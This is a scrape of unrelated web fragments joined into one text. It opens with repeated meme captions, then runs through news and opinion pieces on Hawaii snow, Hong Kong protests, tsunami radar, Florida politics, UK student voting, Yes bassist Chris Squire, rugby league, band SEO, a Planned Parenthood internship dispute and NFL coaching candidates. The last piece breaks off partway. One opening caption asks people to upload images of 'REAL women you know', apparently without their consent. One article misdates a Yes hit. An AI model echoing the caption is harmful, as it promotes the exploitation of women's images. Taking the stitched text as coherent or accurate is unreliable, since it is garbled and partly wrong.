Only post REAL women you know
Stop uploading those posted on social media sites
Only upload REAL women you know
Stop uploading those posted on social media sites
Only upload REAL women you know
after learning how to potty train
how you feel
after learning how to potty train
how you feel
David: hits Goliath in the head with a rock
David: hits Goliath in the head with a rock
after learning to potty train
how you feel
after learning to potty train
how you feel
solomon getting the idea to build a temple
solomon getting the idea to build a temple
Spongebob What I Learned In Boating School Is
Spongebob What I Learned In Boating School Is
what I learned in school
what I learned in school
Spongebob What I Learned In Boating School Is
Spongebob What I Learned In Boating School Is
What I learned in iboating school is...
What I learned in iboating school is...
Spongebob What I Learned In Boating School Is
Spongebob What I Learned In Boating School Is
really really important
really really important
Spongebob What I Learned In Boating School Is
Spongebob What I Learned In Boating School Is
LAST FIVE MINUTES OF TEST
LAST FIVE MINUTES OF TEST
Spongebob What I Learned In Boating School Is
Spongebob What I Learned In Boating School Is
drugs are very good for you
What i learned in school is
drugs are very good for you
What i learned in school is
Spongebob What I Learned In Boating School Is
Spongebob What I Learned In Boating School Is
WHAT I LEARNED ON FACEBOOK TODAY IS
WHAT I LEARNED ON FACEBOOK TODAY IS
to have all your created images and characters saved for future use.
This item will be deleted. Are you sure?
Parts of Hawaii are bracing for a blizzard that could bury its highest points in as many as 10 inches of snow — a storm that would outpace the total snow accumulation in the city of Chicago for 2017.
According to the Chicago Tribune , the city did not record any snow accumulation in January and February for the the first time in 146 years. The city did see a trace amount of snow on Feb. 25 and Jan, 30, but melted before accumulation could be measured.
But on Wednesday evening, Hawaii's Big Island will take the Windy City's place. The National Weather Service is expecting temperatures in the 30s at the peaks of the state's two tallest peaks: Mauna Loa and Mauna Kea. Winds could reach up to 65 mph with possible instances of thundersnow.
It's not uncommon for snow to fall on the peaks of the nearly 14,000 feet high mountains. In December , more than a foot of snow topped the peaks while the rest of the state experienced heavy rains.
But those not on the mountain shouldn't fret. Other parts of the state will experience temperatures in the 60s overnight on Wednesday.
Alex Hider is a writer for the E.W. Scripps National Desk. Follow him on Twitter @alexhider.
More than 100 protesters broke through the gates of Hong Kong's government headquarters as a student demonstration against Beijing's refusal to grant the city unfettered democracy turned angry.
Six people were arrested for offences ranging from forcibly entering government property and public disorder to assaulting an officer, police said in a statement in the early hours of Saturday.
Student groups have been spearheading a civil disobedience campaign along with democracy activists all week in protest at Beijing's announcement last month that it would choose who can stand for Hong Kong's top post of chief executive in elections in 2017.
Around 150 people pushed into the grounds of the complex late Friday, police said, some scaling a high fence, as others outside yelled "open the gates".
"We don't care if we get hurt, we don't care if we get arrested, what we care about is getting real democracy," protester Wong Kai-keung said from the front line of the charge.
Police repeatedly used pepper spray against protesters, who used umbrellas, surgical masks and goggles to protect themselves.
Around 50 demonstrators were still in the complex by early Saturday, surrounded by riot police, who had forcibly removed most of the others.
Around 1,000 protesters had joined the demonstration outside the Southern Chinese city's main government complex through the night.
Numbers had earlier hit more than 2,000 as secondary school pupils, some wearing uniforms, joined university students.
In a statement police said they had arrested six people aged 16 to 29. News footage showed officers taking away a prominent student leader, Joshua Wong.
In a statement, the government "expressed regret" that protesters had stormed the complex, saying security personnel, police officers and protesters had suffered injuries but without giving details.
Teenage pupils had descended Friday on the government headquarters to add their voices to a class boycott kicked off by university students on Monday.
On Thursday night, more than 2,000 people took their protest to the residence of Hong Kong leader Leung Chun-ying with the hope of speaking to him. Leung has so far refused to speak to the students or meet their leaders.
- 'Real not fake elections' -
School pupils as young as 13 joined Friday's protest, shouting: "I want real elections not fake ones".
Chung Chun-wai, 17, said many of his friends joined the protest in defiance of their parents, highlighting the often sharp generational divide in the former British colony over its political future.
"I think secondary school students are a part of society and I consider myself a citizen of Hong Kong. That's why I think I need to bear the responsibility to care about society and to voice the real opinions of Hong Kongers," he said.
Meanwhile around 300 people, mostly elderly retirees originally from mainland China, staged a counter-protest close to the site to support Beijing's decision.
Occupy Central, a prominent grassroots pro-democracy group, has vowed to take over the city's Central financial district to push its demand that Hong Kongers be allowed to nominate who can stand for leader.
Occupy co-founder Benny Tai has previously hinted the takeover could begin on October 1, a national holiday when much of the district will be empty.
He told reporters at the city's Foreign Correspondents' Club on Friday: "After next week's action we may not be able to change the standing committee's decision immediately, but if we could have that very strong determination shown, I personally have the confidence that one day democracy will come to Hong Kong."
Last month China said Hong Kongers would be allowed to vote for their leader for the first time in 2017, but that only two or three candidates approved by a pro-Beijing committee could stand.
Britain handed Hong Kong back to China in 1997 under a "one country, two systems" agreement that allows it civil liberties not seen on the mainland, including free speech and the right to protest.
Chilean Ocean Radar Detected Tsunami - 31/05/2011
ka
The research group lead by Prof. Dante Figueroa from the University of Concepcion in Chile, has reported that their WERA radar system was able to capture the signal of the tsunami that struck northeast Japan in March 2011. This is the first time ever that an ocean radar detected an approaching tsunami.
After the strong earthquake occurred in Japan on 11th March 2011, the tsunami generated travelled across the Pacific Ocean and reached the coast of Chile within 22 hours. Following the earthquake and tsunami news, and due to lack of internet access, Prof. Dante Figueroa drove to the remote WERA ocean radar site and manually switched his WERA system into the fastest operation mode, which allows the collection of real-time data every 30 seconds.
The theoretical basis for this approach is that tsunami waves generate a characteristic periodic ocean surface current pattern that can be used as the tsunami "signature". This tsunami signature was detected in the signal recorded by the WERA system in Chile. A comparison of the measured radar signatures with nearby sea level measurements showed a high correlation between the two signals confirming that the WERA system was successful in capturing the tsunami signal.
This radar measurement of a real tsunami is the proof of concept the ocean radar community has been waiting for.
In addition, the significance of this finding required the rigorous review of the acquired data and confirmation of the results by three independent scientific groups (University of Concepcion, Chile, University of Hamburg, and Hamburg University of Technology, Germany). The final and detailed results of the analysis will be presented by these groups in upcoming conferences and in the peer-reviewed literature.
More information
Last updated: 27/02/2019
There once was a governor who watched faithfully over his flock of citizens. One day, from atop his mansion, he began to cry out, "Bankrupt! We're going Bankrupt!'' The citizens grew concerned and hurried over to see. When they realized he was not telling the truth, they went grumbling back to their homes. A short time later, the governor spoke up again. "Bankrupt,'' he cried. "We're going bankrupt!'' Once again, the citizens panicked. And once again, they realized they had been duped. Later, when the governor wanted to talk about all the good things he had accomplished for his flock of citizens, he couldn't understand why no one wanted to listen.
We get it.
Gov. Rick Scott does not like the Affordable Care Act.
Didn't like it when he was running for governor. Didn't like it when it was being argued in front of the Supreme Court. Doesn't like it now that it has become the law of the land.
To be honest, this doesn't make the governor unique — there are plenty of people skeptical of Obamacare.
Nor does this mean Gov. Scott's concerns are necessarily misplaced — the impact of massive health care reform cannot be guaranteed.
But today's worry is not about details. It is about honesty. Trust. Fair play.
A number of times in recent months, Scott has tossed around incorrect facts and highly dubious numbers while railing against the Affordable Care Act.
Frankly, it's hard to say which is worse:
That a sitting governor does not know simple truths about this important legislation, or that he does know the truth and chooses to ignore it.
Scott once went on CNN and talked about a small-business owner who told him he could not afford to pay for health care for 20 employees, and thus would have to go out of business.
It sounded drastic, poignant and sad. Except it was utterly wrong. The ACA does not require businesses to provide health care unless they have 50 or more employees.
It is one of the most basic components of a plan Scott has supposedly studied, and yet the governor brazenly passed on this bad information to a national television audience.
He has also compared the new law to Canada's system and suggested it will lead to a rationing of health care. This is a spurious argument since the majority of Americans will keep the same health insurance they've always had.
Scott has also offered wildly inflated costs for Obamacare on several occasions, even after being told by his own state officials that the numbers he was quoting were incorrect by billions and billions of dollars.
Now all of this is troubling on two major fronts.
No. 1, how strong is your argument against the Affordable Care Act if you have to continually exaggerate to make your point?
If this plan is as dangerous as you claim, the numbers should speak for themselves and Americans should be able to figure that out. Instead, the governor chooses the most extreme and unlikely scenarios, and then embellishes from there.
No. 2, if you're continually caught stretching the truth on health care, how much credibility do you have on other issues?
Should your argument be trusted on corporate taxes? On environmental rollbacks? On the benefits of privatization? On the reliability of standardized testing in schools?
Look, the governor understands the business world. Scott rose from modest roots to become an extremely wealthy man at a relatively young age.
And it's true that much of his appeal as a candidate in 2010 was that he was going to bring a corporate-like approach to governing.
But there are differences between running a business and serving constituents. Public service is usually not an end-justifies-the-means industry.
You may owe it to the public to fight for what you believe in, but you also have an obligation to make it a fair fight.
Here's the bottom line on the Affordable Care Act:
The executive, legislative and judicial branches of the government have signed off on it. The nation's voters have given it their seal of approval by re-electing the president. And Florida's voters gave it a thumbs-up via an amendment on the November ballot.
Now it is entirely possible, years from now, the Affordable Care Act will be considered a gallant failure by the Obama administration.
And, if so, it will certainly be a fact that Rick Scott had been right all along.
But until that day, the governor has no right to create his own facts.
At the next election, the student voice must be heard. Under this government, students have seen tuition fees tripled, EMA scrapped and record high levels of youth unemployment. Many graduates from will leave university with a lot of debt and little prospect of immediate work.
But there is a risk that many students will be unable to vote because of plans to individually register voters. Individual Electoral Registration requires those who are not already on a household register, and cannot be matched with DWP data, to register individually. As a transient population, moving from their family home to a new place of study, often without contact with the benefits system or paid employment, students are a particularly susceptible group.
For many enrolling at university for the first time, registering to vote is understandably not their top priority. There's remembering to bring all your books, registering with a new GP, the stress that naturally comes from leaving home for the first time and, perhaps most importantly, all the other distractions of freshers' week! It is often only when the general election campaign starts that students will become engaged in the choices they face. By then, it may be too late. At present, electors can only register to vote up to 11 days before polling day. Many students may be disenfranchised.
This could have a huge effect on the general election result. Many of the seats that will decide who forms the next government have large full-time student populations. In Lancaster and Fleetwood, the sitting Tory MP has a majority of just 333. There are 14,334 students in the constituency. A vast majority of them will have to register individually or will be disenfranchised. The government's own pilot shows that 99 per cent of Lancaster University will not be on the register unless each individual signs up.
In Cardiff North, the Conservative majority is 194 and the student population is 8,268. In Manchester Withington, the current Lib Dem has a majority of 1,894, but potentially faces a student backlash, with 15,761 living in his constituency. And it's not just coalition-held marginals that could be threatened. My colleague Paul Blomfield, MP for Sheffield Central, has a majority of 165 and the highest student population in the country of 36,335.
Many have already seen the dangers of this on the horizon. Indeed, Paul is working with his local council in Sheffield and the university to ensure as many of the students in his constituency have a chance to vote. Where possible, the University and the Electoral Registration Officer is entwining student enrolment with voter registration. In my city of Liverpool, I am convening a meeting with the university and the Ccuncil this week to put in place plans to replicate this model.
Across the country, universities, councils and student unions should be aware of the challenges individual registration represents. If they don't do something about it, many students may turn up at the ballot box, determined to have their say, only to be turned away.
Stephen Twigg is shadow minister for constitutional reform and MP for Liverpool West Derby
Founding bassist for the seminal progressive rock band Yes, Chris Squire has died at the age 67. It was recently revealed that Squire was battling Acute Erythroid Leukemia (AEL) cancer, a rare form of Acute Myeloid Leukemia (AML). Squire had been forced to pull out of the band's upcoming Summer Tour to undergo treatment.
Born March 4, 1948 in London, England, Squire became known for a signature sound that came from his Rickenbacker bass. With guitarist Jon Anderson, he formed Yes 1968 and went on to become a major influence on the burgeoning progressive rock scene. By 1972 the band was a worldwide success, with hits such as “Roundabout” and “Owner Of A Lonely Heart,” the latter of which Squire helped write.
Known by the nickname “Fish,” Squire was also an accomplished solo artist, issuing his first solo LP, Fish Out Of Water in 1975. The lone remaining original member in Yes, Squire's death means the band will play their first show without the founding bassist in their 47 year career when they take the stage August 7 at the Foxwoods Resort Casino in Mashantucket, Connecticut.
A Kangaroos star's stunned reaction to the Roosters' salary cap, a Luke Keary contract snag that could see him out the door, and Peter Sterling's advice for Mitchell Pearce.
All the latest rugby league news in Media Watch!
Mansour stunned by Roosters' salary cap
Fans aren't afraid to express disbelief at the Roosters' seemingly limitless ability to fit new stars under the salary cap but most players won't publicly go there.
So it was refreshing to hear Josh Mansour's shocked reaction to Cooper Cronk's signing, with the Kangaroos winger taken aback by the roster the Tricolours are putting together.
“Yeah, Jesus. How do they fit everyone?” Mansour laughed, when asked about the Cronk signing by media on Monday.
“Yeah, oh mate, they're going to have a good team obviously, so they'll definitely be a force to be reckoned with.”
Josh Mansour couldn't believe the Roosters' signing of Cooper Cronk. Source: News Corp Australia
The candid comment comes on the same day it was revealed Mitchell Pearce had met with Trent Robinson, with the Roosters coach publicly expressing his eagerness to keep the No.7 at the club, even if he does have to drop to the bench.
So Mansour was no doubt thinking the same thing many fans are: How can the rest of the competition expect to compete with a side boasting Cronk, James Tedesco, Pearce, Keary, Jake Friend as well as a pack littered with Test players and a back five that includes Blake Ferguson, Daniel Tupou, Latrell Mitchell and Michael Gordon?
Keary deal not over the line
While most of the focus of Cronk's signing with the Roosters has been on Mitchell Pearce's next move, a snag with the club's extension offer to Luke Keary could be the next plot twist, according to The Australian senior rugby league reporter Brent Read.
Speaking on NRL 360, Read revealed Keary was underwhelmed by the money on offer from the club to keep the five-eighth tied at Bondi for a further two years beyond his current contract, which expires at the end of next season.
Keary had an outstanding 2017 but the Roosters' decision to add Cronk and Tedesco on big deals, while trying to keep their current playmakers, could ultimately cost him a significant pay rise.
According to Read that could potentially change the conversation around Pearce.
“The interesting thing about Keary is they're (the Roosters) in talks with him about a contract extension and from what I can understand the offer hasn't been that good,” Read said.
“It's nowhere near what Luke Keary would expect so maybe, if they can't reach an agreement with Luke Keary on an extension, maybe it's Keary who goes and Mitchell Pearce plays five-eighth.”
Sterlo would leave if he was Pearce
After meeting with coach Robinson on Monday, Pearce has a massive call to make about whether to eat humble pie and take a bench role at the Roosters or look elsewhere.
Legendary half Peter Sterling was the main man at the Eels for most of his career and said it would be nearly impossible for Pearce to take a back seat after a decade of wearing the No.7 jersey.
For that reason Sterling said he would leave for a fresh start if he was Pearce.
“I'm just trying to put myself in the place of Mitchell Pearce. I'd really struggle to stay,” Sterling said on Triple M's Dead Set Legends on Monday.
“Twenty-eight years of age, 240 first grade games, current NSW halfback, played 17 Origins. To then have the alternative of coming off the bench or playing out of dummy half, it doesn't appeal to me.
“I'd consider myself an elite halfback, a starting halfback. To sign another halfback and have the thought that it means the hooker can play less minutes, the ramifications for Mitchell Pearce aren't good.
“ ... I'd struggle to stay. I'm keen to know what Trent Robinson had to say to Mitchell Pearce and he's been a strong supporter of Mitchell as all the club has while he's been there. But this is really going to test that.
“I don't believe Mitchell Pearce fits alongside Cooper Cronk as starting halves.
“Luke Keary had a fantastic season this year. He is the running five-eighth the Roosters need and enjoyed this year.
“If the hooker, Jake Friend, is going to play less minutes, it's really Mitchell Pearce in the gun sights there.
“They're not going to bring Cronk off the bench ... I think Keary's the best alternative with six on his back, so Mitchell Pearce looks like he comes off the bench and if I'm Mitchell that doesn't sit with me.”
England optimistic about Burgess
England are expecting to have Sam Burgess back as early as the quarterfinals of the Rugby League World Cup in what would be a stunning recovery from a medial ligament injury.
Burgess limped off in the first half of England's tournament opening loss to Australia after hurting his knee, with an initial prognosis that had him struggling to return in the World Cup even if his side made the final without him.
However, several days later the team has got a more optimistic view about his potential role later in the tournament, with Burgess taking part in some light exercises at a training session at Redfern Oval.
An injured Sam Burgess talks to Billy Slater after England's loss to Australia. Source: Getty Images
Coach Wayne Bennett suggested the 28-year-old's medial ligament damage was “not too bad”.
“We are aiming for (quarter-finals) ... quarters at best. At worst, the next game after that,” Bennett told reporters.
“It's not as serious as it could have been.”
Winger Jermaine McGillvary, who crossed for England's only try in their 18-4 loss to the Kangaroos, offered an even more optimistic diagnosis.
“Hopefully he's going to be back for the quarter-finals, or maybe before. He'll be back soon,” McGillvary said.
Treat Pacific Tests like Origin: Pritchard
Veteran forward Frank Pritchard has called on administrators to start treating Pacific Tests more like State of Origin and watch the international game grow.
Pritchard is one of the spearheads of the Samoa forward pack, with his side set to meet Tonga in a massive World Cup rivalry clash this weekend.
Speaking to NRL.com, he said the potential of match ups between the two was limitless if treated in the right way.
“You have to look at the bigger picture. There's only that one-off test in [May] and then if there's no Four Nations at the end of the year then we lose out,” Pritchard said.
“It's just about having the availability and clubs letting those guys play and making the stance that the Pacific Test has the same pedigree as State of Origin.
“It will take time but they need to make it a proper game first and foremost.
“The numbers that are in the NRL, I think it's something like 47 per cent that are Pacific Islanders in the game so I think the NRL need to endorse that a little bit more.”
Sticking point in pay deal
The NRL is on the verge of withdrawing its pay offer to the players, with the Rugby League Players' Association still to sign off on the deal.
Speaking about the issue on NRL 360, senior News Corp journalists Paul Kent, Phil Rothfield and Brent Read warned the NRL's threat was real due to the parlous financial state the game is currently in.
“They've got a deal as good, if not better, than the AFL players,” Rothfield said.
“AFL players get more backsides on seats, they get more money in sponsors because they're a fully national game.
“So if the NRL players don't take this I think they are crazy, I think they're going to lose a PR battle and I think they'll come out of it as greedy.”
Read added that the clubs were now in a position where they would likely side with the NRL as concern grows around the game's financial future.
“If the clubs get the opportunity to peel some money back, you can bet they'll peel it back because the game is struggling financially and a lot of it's gone to the players,” Read said.
Kent explained that the sticking point for the Players' Association was the NRL's plan for unprojected revenue unaccouted for in the 29.5 per cent set to go to the players.
“The sticking point is how they divide non projected profit revenue,” Kent said.
“So after the 29-and-a-half per cent, they're working on a figure of what that will be, but if the game makes more money than what they anticipate, how do they do that?
“Now Todd (Greenberg) wants to profit share, he wants to split it four ways — NRL, players, clubs and grassroots — the players just want a flat 29 and-a-half per cent of that (unforecasted) revenue.”
When it comes to search engine rankings, the most famous person wins; A.K.A the person who gets the most searches for their chosen keywords. By investing time, little and often, you'll build and maintain a presence that Google deems necessary to rank highly.
What's a keyword?
A keyword is a word or phrase that you rank highly for (or would like to rank highly for), when people search Google. For the band name, you'll want to be the first search result on Google or at least in the top three. If you're an indie band, you need to focus on words and phrases that are closely associated to you or your following. It's all about relevance, so think about and choose what you'd like to be known for and what will make it easy for potential fans to find you. For example, things such as your track names and latest album titles are essential.
How to find them:
Brainstorming
These technologies are great but gaining a new perspective can drum up some great results too. If you doubt any of your ideas, test them using the tools to check their validity.
The Get Ideas Tool
The ‘Get Ideas' tool on keyword planner is one of our personal favourites. Input basic informa- tion and the top keyword phrases associated with these words will appear. The tool analyses existing user searches and their associated search terms, making it a simple and effective method to find alternative, relevant, generic terms. Please do bare in mind, however, that the tool won't pick up on your specifics, such as album title or iconic lyric lines. This is in our opinion the best way to get ideas for keywords as it comes directly from Google. You just type in a band you think are similar to and click ‘get ideas.' It couldn't be easier!
Keyword Tools
Once you press enter this is where you will see all of your ideas and the frequency they are searched. Until you have enough of your own data to work out which are your most popular searches, this is a good basis to go off.
The final way of researching keywords is using the http://keywordtool.io/youtube. It is the simplest way of researching effective keywords. YouTube is the second biggest search engine after Google (and is owned directly by Google). Identifying and inputting effective keywords for your content on YouTube is a must. We recommend tagging your videos or content once you have uploaded it, as well as putting the lyrics within the description. All this will contribute to official content ranking higher against fan-curated or ripped copies.
What Keywords We think you should be using:
Band Name
For most bands this is straightforward, but for others (such as Basement or Train) these names are all more recognizable as other things. We recommend using your band name as a keyword alongside including ‘band' or ‘singer' after to make a keyword phrase.
The search results for ‘basement' bring up the knowledge panel for the worlds cellars so there is little point in bid- ding for this keyword.The results for ‘Basement Band' show the band's knowledge panel and links. It is always worth having the keyword ‘*artist name* band' or ‘*artist name* singer'.
Specific Lines Within Lyrics
We all know those lines that everyone can perfectly recall, whilst muttering total jibberish for the rest of the track (think MMMBop); those moments of clarity are the lines that potential fans will remember and what they will use to search for you if they don't know anything about you.
Song Names
Let's use our favourite fellow-Mancunians as an example. Oasis released a song called ‘Champagne Supernova'; the track has multiple definition interpretations but the phrase had no meaning until the release of the track. If the track title is already known, we'd recommend including the track title as a keyword on it's own, as well as including ‘song' afterwards to make a keyword phrase.
Album Names
This is key for people finding channels to buy. As you'll see in the ‘How this helps you to make money' section below it will help with making your albums appear as a top search result and get you an album carousel on Google.
Anything That Relates to You
If you have a big article or press release on the first page of a major or highly credible blog, we'd recommend using keyword phrases to encompass this, such as “*band name* NOISEY”, or “*track title* ROLLING STONE”.
Now have keywords, what do you do with them?:
Wiki
When you obtain a Wikipedia page and gain control of it, this is a great source to use key- words – the reference area is perfect for including multiple links and helps with link validation.
YouTube Bios
For YouTube, your content will be really effective if you put keywords in the video's bio (optional when you upload), along with the contents lyrics (where appropriate) and utilizing the tagging options. It will help you to rank highly within YouTube and Google.
Blog Posts
Incorporating keywords into blog posts is important for getting the individual blog pages and the overall website to rank higher. As well as including keywords in the copy itself, ensure you include keywords in the headline. There are some great free tools to help you do this effectively and our favorite is Yoast for SEO. Ensure you're not that person talking about indie band tickets, in your music blog titled indie band tickets, which mentions indie band tickets that you can buy from indie band ticket websites. See where we're going with that? Although inclusion of keywords is important, so is authenticity and quality content.
The Website
The general Website copy should incorporate the keywords in a natural and authentic way. The home page introduction, the artist biographies and any descriptions of the content, should all reference any relevant words from your keyword list within them.
Images
For imagery on your website, you can include a visible or invisible description. This is a great place to include a few relevant keywords about the image; by naming the image appropriately, you'll help the image itself to rank higher.
Want more?
To keep this blog post a reasonable length we've only covered the basics.To get more in-depth tips on tackling keywords sign up to receive our free e-book ‘101 Tips for Artist Success in the Digital World' below:
Australia has broken ranks with the United States and New Zealand over Israel, indicating that it would most likely have opposed the UN Security Council resolution condemning Israeli settlements in the West Bank and East Jerusalem.
Israel recalled its ambassador to New Zealand for consultations after NZ co-sponsored the resolution demanding that Israel "immediately and completely cease all settlement activities in the occupied Palestinian territory, including East Jerusalem", and saying the settlements had "no legal validity and [constitute] a flagrant violation under international law".
Israeli Prime Minister Benjamin Netanyahu phoned New Zealand's Foreign Minister, Murray McCully, to warn him the resolution was a "declaration of war", according to a leading Israeli newspaper.
After the resolution, Israel's government said it would move ahead with thousands of new homes in East Jerusalem and said it had received "ironclad" information that Washington had helped craft the resolution.
A Vermont student is making a fuss after her Catholic college refused to give her credit for an internship with Planned Parenthood.
Erin Irons, a senior at Saint Michael's College in Colchester, Vermont, applied to intern at the abortion business's New England affiliate this summer and was approved, according to a report from the Vermont Seven Days. When she contacted the college to request credit for the internship, the college refused.
Karen Talentino, vice president for academic affairs at the college, told the news outlet that the college did not approve the credits because Planned Parenthood's abortion practices go against Catholic teachings.
“One of [the Catholic church's] most fundamental convictions is that abortion is sin and is murder of a living person, so given that we are a Catholic college, I think it makes sense that we would not form a formal relationship with an organization that not only performs abortions but is an advocate for continuing to perform abortions,” Talentino said.
The college newspaper reports more on the issue:
Talentino said that even though Planned Parenthood offers a wide variety of services past abortion and contraception, it is still most credited and distinct for those particular services. The flurry of controversy surrounding the organization in the government lately only adds to the opposition of the college's sponsorship of the internship. CLICK LIKE IF YOU'RE PRO-LIFE! “Planned Parenthood is a political lightning rod right now,” Talentino said. The limitation on student internships conflicting with the Catholic mission extends to other aspects of St. Michael's as well. The college does not invite commencement speakers or have honorary degree candidates who are very actively involved in pro-choice movements.
Irons, a double major in history and political science with a minor in gender studies, is not satisfied, though.
“If anything was to prepare me for the quote unquote real world, it would have been this internship,” she told the news outlet.
The young woman, who was raised Catholic but isn't now, is asking the college to provide more details about its internship policy, specifically which organizations it would not approve for student internships.
Talentino said the college wants to help Irons find another internship that would not conflict with the college's Catholic mission.
The school previously refused to approve credit for another student's internship with Planned Parenthood in 2011, according to the college newspaper.
The nation's largest abortion chain is known for targeting college students with its pro-abortion agenda. And while Planned Parenthood supporters emphasize its non-abortion services, the abortion business performs more abortions than any other group in the nation.
LOS ANGELES -- The proverbial first domino fell on Monday, when Jacksonville announced that interim coach Doug Marrone would remain in the role full time.
That leaves five coaching vacancies, for Denver, San Francisco, Buffalo, San Diego and, most relevant here, the Los Angeles Rams.
The Rams' interviewing party, led by executive vice president of football operations and chief operating officer Kevin Demoff, left, has some very important work ahead of it these next few days as it searches for the franchise's next head coach. Mark J. Terrill/AP Photo
The Rams' interviewing party -- a group that is led by COO Kevin Demoff and also includes Les Snead, who might or might not remain general manager after this process is complete -- returned to Southern California on Monday and has some very important work ahead of it these next few days. Assistant coaches on playoff teams who continue on cannot be interviewed for the first time after this weekend, with second interviews only allowed the weekend before the Super Bowl. Once eliminated, of course, interviews can be scheduled at any time.
Last week, the Rams interviewed Steve Wilks, Harold Goodwin, Sean McVay, Josh McDaniels, Matt Patricia, Anthony Lynn and, before he came off the board, Marrone. This week, they're expected to interview Teryl Austin, Mike Vrabel, Vance Joseph and Kyle Shanahan, whose original interview was held up by weather. Other names might pop up, as well. A convenient one-stop shop for content related to all coaching vacancies can be found here. Below is a categorical look at the 10 names linked to the Rams.
Teryl Austin
Age: 51
Current title: Lions defensive coordinator, three seasons
Prior roles: Ravens secondary coach (2011-13) ... Florida defensive coordinator (2010) ... Cardinals defensive backs coach (2007-09) ... Seahawks defensive backs coach (2003-06)
Why he fits: Austin runs a very aggressive 4-3 scheme -- though he can also adjust well -- and has historically gotten the most out of his players. He can do well with a Rams group that features a solid defensive line and athletic linebackers, and he'd be very well-suited to improve a thin secondary. Austin has coached the secondary for Super Bowl teams in 2005 (Seahawks), 2008 (Cardinals) and 2012 (Ravens). He also has the magnetic personality that can thrive in a big market like Los Angeles, ESPN Lions reporter Michael Rothstein would tell you.
Why he doesn't: Austin interviewed for head coaching vacancies with eight teams the past two years and many believe this is the year he finally gets a gig. The Rams might not be a fit, though, for one very obvious reason -- their biggest need is someone who can fix the offense. And though Demoff has stressed that the organization would remain open-minded in its search, it's hard to hire someone like Austin unless he has an offensive-minded coach he can bring with him. The Lions won't let current offensive coordinator Jim Bob Cooter take the same job elsewhere. Maybe quarterbacks coach Brian Callahan?
Harold Goodwin
Age: 43
Current title: Cardinals offensive coordinator, four seasons
Prior roles: Colts offensive line coach (2012) ... Steelers offensive line coach and quality control coordinator (2007-11) ... Bears assistant offensive line coach (2004-06)
Why he fits: Goodwin came up coaching offensive lines, which is nice for a Rams team that drafted seven offensive linemen from 2014-15 and has yet to see results. While he was in Pittsburgh, the Steelers frequently had strong running games. In Arizona, he helped spark the resurgence of quarterback Carson Palmer. The Cardinals improved 20 spots, from 32nd to 12th, in total offense in Goodwin's first year as offensive coordinator in 2013. In 2015, they had the best offense in the NFL.
Why he doesn't: Goodwin doesn't call plays. That task falls on Bruce Arians, one of the NFL's sharpest offensive minds. Goodwin has certainly gained a lot from working under Arians all these years, but going from an offensive coordinator who doesn't call plays to the head coach of a team that needs a lot of offensive help might be too big of a jump. Goodwin might need more seasoning.
Vance Joseph
Age: 44
Current title: Dolphins defensive coordinator, one season
Prior roles: Bengals defensive backs coach (2014-15) ... Texans defensive backs coach (2011-13) ... 49ers defensive backs coach (2006-10)
Why he fits: Joseph is the third successful defensive backs coach to emerge as a head coaching candidate for the Rams, who previously employed another former defensive backs coach -- Jeff Fisher. Under Joseph's watch from 2014-15, the Bengals' secondary led the NFL with 41 interceptions and limited opposing quarterbacks to an NFL-low 77.4 passer rating. In three seasons in Houston, the Texans allowed the NFL's lowest completion percentage (54.5). Joseph has a knack for developing young defensive backs. He's also an honest, clear communicator.
Why he doesn't: The Dolphins' defense wasn't very good in Joseph's first year as an NFL coordinator. Miami gave up the fourth-most yards during the regular season, then surrendered 30 points in a wild-card loss to the Steelers.
Anthony Lynn
Age: 48
Current tile: Bills interim head coach, one season
Prior roles: Bills offensive coordinator and running backs coach (2015-16) ... Jets assistant head coach (2014) ... Jets running backs coach (2009-13) ... Browns running backs coach (2007-08) ... Cowboys running backs coach (2005-06) ... Jaguars running backs coach (2003-04)
Why he fits: Two words: running game. Under Lynn's watch, the Bills have boasted the NFL's most effective rushing attack each of the past two years. Lynn helped Fred Taylor rush for a combined 2,796 yards from 2003 to '04, then helped Jamal Lewis have back-to-back 1,000-rushing-yard seasons from 2007 to '08. From 2009 to '13, the Jets -- with four different lead rushers -- averaged 136 rushing yards per game, third-highest in the NFL during that time. Lynn is the perfect man to help a Rams running attack that declined drastically in Todd Gurley's second season.
Why he doesn't: Like Goodwin, Lynn doesn't have much experience as a play-caller, doing it in only the final 13 games of 2016. He also never worked with quarterbacks until he became offensive coordinator this season, which would bring serious questions as to whether he could actually help 2016 No. 1 overall pick Jared Goff. That inexperience might not jibe for a Rams organization that needs a quick turnaround in an impatient market.
Josh McDaniels
Age: 40
Current title: Patriots offensive coordinator and quarterbacks coach, five seasons
Prior roles: Rams offensive coordinator and quarterbacks coach (2011) ... Broncos head coach (2009-10) ... Patriots offensive coordinator and quarterbacks coach (2006-08) ... Patriot quarterbacks coach (2004-05) ... Patriots defensive assistant (2002-03)
Why he fits: McDaniels has spent 13 years learning under Bill Belichick and working with Tom Brady, and along the way he has developed into one of the game's most innovative offensive minds. The Patriots finished within the top 10 in points in all nine of McDaniels' seasons as offensive coordinator. That includes 2007, when McDaniels was at the controls of an offense that scored a then-record 75 touchdowns. And it includes 2016, when McDaniels masterfully adjusted while being without Brady for the first four games and without Rob Gronkowski for the final five.
Why he doesn't: McDaniels didn't handle his first head coaching gig well. He bickered with Jay Cutler and Brandon Marshall, reportedly tuned out his assistant coaches, did not make sound personnel decisions and wound up in the middle of a videotaping scandal. McDaniels was only 33 when he took that job and said he has since grown. The Rams would really be counting on that if they gave him the job. McDaniels didn't necessarily help them in 2011, a 2-14 finish with an offense led by Sam Bradford and Steven Jackson.
Sean McVay
Age: 30
Current title: Redskins offensive coordinator, three seasons
Prior roles: Redskins tight ends coach (2011-13) ... Redskins assistant tight ends coach (2010) ... wide receivers coach and quality control coordinator in United Football League (2009) ... Buccaneers offensive assistant (2008)
Why he fits: Kirk Cousins was a fourth-round pick who sat behind Robert Griffin III for the majority of his first three seasons. McVay helped elevate him to a star. With McVay as offensive coordinator from 2015-16, Cousins ranked third in completion percentage, fourth in Total QBR and fifth in yards per attempt. During that time, the Redskins' offense gained the sixth-most yards in the NFL. McVay has quickly become an aggressive play-caller who loves to throw the ball downfield. He also projects himself well and has quickly gained a reputation as a standout interviewer. ESPN Redskins reporter John Keim highlighted some of McVay's traits here.
Why he doesn't: Well, you know, he's really, really young. McVay will be 31 by the end of this month. And though he has packed a lot of NFL experience in a very short time, McVay -- grandson of former Giants coach and 49ers vice president John McVay -- is still evolving as a play-caller and a leader.
Matt Patricia
Age: 42
Current title: Patriots defensive coordinator, five seasons
Prior roles: Patriots safeties coach (2011) ... Patriots linebackers coach (2006-10) ... Patriots offensive assistant (2004-05)
